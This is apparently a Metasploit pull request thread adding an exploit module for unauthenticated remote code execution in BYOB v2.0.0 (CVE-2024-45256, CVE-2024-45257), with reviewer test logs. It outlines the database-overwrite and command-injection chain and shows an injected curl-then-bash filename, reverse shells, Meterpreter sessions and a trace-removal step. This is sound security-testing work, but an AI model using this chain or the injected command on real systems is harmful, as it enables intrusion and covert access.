Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257)

[Chocapikk]

Hello Metasploit Team,

I hope this message finds you well.

I am submitting a new module that exploits two critical vulnerabilities identified in the BYOB (Build Your Own Botnet) v2.0.0. These vulnerabilities include an Unauthenticated Arbitrary File Write (CVE-2024-45256) and an Authenticated Command Injection (CVE-2024-45257), which allows attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.

Module Overview:

1. Arbitrary File Write: The exploit takes advantage of the file upload feature to overwrite the SQLite database, allowing the creation of a new admin user without authentication.
2. Command Injection: After gaining admin privileges, it leverages a command injection vulnerability in the payload generation feature to execute arbitrary commands.

Testing:

This module has been tested against BYOB versions 2.0.0 on Linux Mint environment running Python 3.10.12.

Verification Steps:

1. Start the Metasploit console
2. Use the module: exploit/unix/webapp/byob_unauth_rce
3. Set the target information, including RHOST, RPORT, etc.
4. Run the exploit, and a reverse shell will be triggered on successful exploitation.

Thank you for reviewing this contribution. Looking forward to your feedback!

[Chocapikk]

The changes are as follows

[dledda-r7]

Hello @Chocapikk,
I was able to get a meterpreter session.
I noticed there is an error on trying restore the database

msf6 exploit(unix/webapp/byob_unauth_rce) > 
[*] Started reverse TCP handler on 172.24.233.241:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.24.233.241:5000/Cog3o8Zj
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/buildyourownbotnet/database.db
[*] Registering a new admin user: admin:Yed8EEY36Cui
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.24.236.224
[*] Sending response to 172.24.236.224 for /
[*] Sending stage (3045380 bytes) to 172.24.236.224
[*] Restoring the database via Meterpreter to avoid leaving traces.
[-] Failed to restore the database: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] Failed to restore the database on all attempted paths.
[*] Meterpreter session 1 opened (172.24.233.241:4444 -> 172.24.236.224:34012) at 2024-10-10 06:27:32 -0400

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /home/user/byob/web-gui/buildyourownbotnet/output/admin/src
====================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100664/rw-rw-r--  116   fil   2024-10-10 06:27:29 -0400  .HiFR
100775/rwxrwxr-x  250   fil   2024-10-10 06:27:29 -0400  OOjsaEAQzBVK
100664/rw-rw-r--  343   fil   2024-10-10 06:27:29 -0400  byob_nix$([email protected]:5000$IFS-o$IFS.HiFR&&bash$IFS.HiFR)_amd64_jA7.py
100664/rw-rw-r--  1320  fil   2024-10-10 06:27:29 -0400  byob_nix$([email protected]:5000$IFS-o$IFS.HiFR&&bash$IFS.HiFR)_amd64_jA7.spec
100664/rw-rw-r--  621   fil   2024-10-10 06:27:29 -0400  requirements.txt

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 172.24.236.224
OS           : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[dledda-r7]

Ok I've retested after the changes, looks good to me.

msf6 exploit(unix/webapp/byob_unauth_rce) > 
[*] Fetch handler listening on 172.26.52.39:8080
[*] HTTP server started
[*] Adding resource /byobfetch
[*] Started reverse TCP handler on 172.26.52.39:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.26.52.39:5000/rmTHGJSSF7
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/../../../../buildyourownbotnet/database.db
[*] Registering a new admin user: admin:SsOOH3Tuk9dD
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.26.60.213
[*] Sending response to 172.26.60.213 for /
[*] Client 172.26.60.213 requested /byobfetch
[*] Sending payload to 172.26.60.213 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.26.60.213
[*] Restoring the database via Meterpreter to avoid leaving traces.
[+] Database has been successfully restored to its clean state.
[*] Meterpreter session 1 opened (172.26.52.39:4444 -> 172.26.60.213:60774) at 2024-10-14 08:14:50 -0400

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter x64/linux  user @ 172.26.60.213  172.26.52.39:4444 -> 172.26.60.213:60774 (172.26.60.213)

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 172.26.60.213
OS           : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

[dledda-r7]

Release Notes

This adds an exploit module for BYOB unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)